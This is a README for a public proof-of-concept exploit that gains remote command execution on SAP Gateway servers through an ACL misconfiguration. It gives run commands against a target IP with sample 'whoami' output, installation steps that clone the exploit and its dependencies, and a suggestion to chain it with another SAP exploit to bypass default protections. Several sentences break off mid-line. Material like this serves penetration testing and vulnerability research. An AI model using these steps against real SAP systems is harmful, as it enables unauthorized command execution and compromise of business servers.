What is it?
This PoC exploits an ACL misconfiguration in the SAP Gateway (port 33xx) that leads to a Remote Command Execution (RCE).
SAPanonGWv1.py is the first version of the exploit based on raw
packets sent. It does not require any additional modules (Run and
SAPanonGWv2.py is the second version of the exploit based on the
These PoCs were developed by Dmitry @_chipik Chastuhin
How to use
➜python SAPanonGWv1.py -t 172.16.30.28 -p 3300 -c whoami [*] sending cmd:whoami n45adm
➜python SAPanonGWv2.py -t <ip> -p 3300 -c whoami [INFO ] [+] Sending GW_NORMAL_CLIENT [INFO ] Response: OK [INFO ] [+] Sending F_SAP_INIT [INFO ] Response: OK [INFO ] [+] Sending F_SAP_SEND [INFO ] [+] Sending F_SAP_SEND2 n45adm
git clone https://github.com/gelim/pysap pip install -r pysap/requirements.txt python pysap/setup.py install git clone https://github.com/chipik/SAP_GW_RCE_exploit
git clone https://github.com/chipik/SAP_GW_RCE_exploit pip install -r SAP_GW_RCE_exploit/requirements.txt
SAP GW ACL bypass
You can use these exploits together with SAP MS Trusted exploit that allows you to bypass dafault
See our presentation for details
Contributions made by: